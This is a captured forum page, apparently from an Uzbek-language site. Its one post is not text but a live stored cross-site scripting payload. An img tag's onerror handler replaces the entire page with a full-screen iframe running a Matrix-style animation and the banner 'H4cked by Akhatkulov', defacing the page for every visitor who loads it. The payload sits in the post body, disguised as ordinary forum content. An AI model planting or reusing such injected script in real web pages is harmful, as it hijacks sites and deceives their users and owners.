logo

Forum 10

forumUserImage

Mexroj

muallif

July 28, 2025

xizmatchilik

<img src=x onerror="
document.body.innerHTML = `<iframe style='position:fixed;top:0;left:0;width:100vw;height:100vh;border:none;z-index:9999;' srcdoc=\`
  <style>
    body { margin:0; background:black; overflow:hidden; }
    canvas { display:block; }
    h1 {
      position: absolute;
      top: 40%;
      width: 100%;
      text-align: center;
      color: lime;
      font-size: 40px;
      z-index: 10;
    }
  </style>
  <canvas id='matrix'></canvas>
  <h1>H4cked by Akhatkulov</h1>
  <script>
    const canvas = document.getElementById('matrix');
    const ctx = canvas.getContext('2d');
    canvas.height = window.innerHeight;
    canvas.width = window.innerWidth;
    let chars = 'アカサタナハマヤラワ0123456789'.split('');
    let fontSize = 14;
    let columns = canvas.width / fontSize;
    let drops = Array.from({ length: columns }).fill(1);
    function draw() {
      ctx.fillStyle = 'rgba(0, 0, 0, 0.05)';
      ctx.fillRect(0, 0, canvas.width, canvas.height);
      ctx.fillStyle = '#0F0';
      ctx.font = fontSize + 'px monospace';
      for (let i = 0; i < drops.length; i++) {
        let text = chars[Math.floor(Math.random() * chars.length)];
        ctx.fillText(text, i * fontSize, drops[i] * fontSize);
        if (drops[i] * fontSize > canvas.height && Math.random() > 0.975) drops[i] = 0;
        drops[i]++;
      }
    }
    setInterval(draw, 35);
  </script>
\`></iframe>`;
">
 

Fikrlar: 1

forumUserImage

Mexroj

July 28, 2025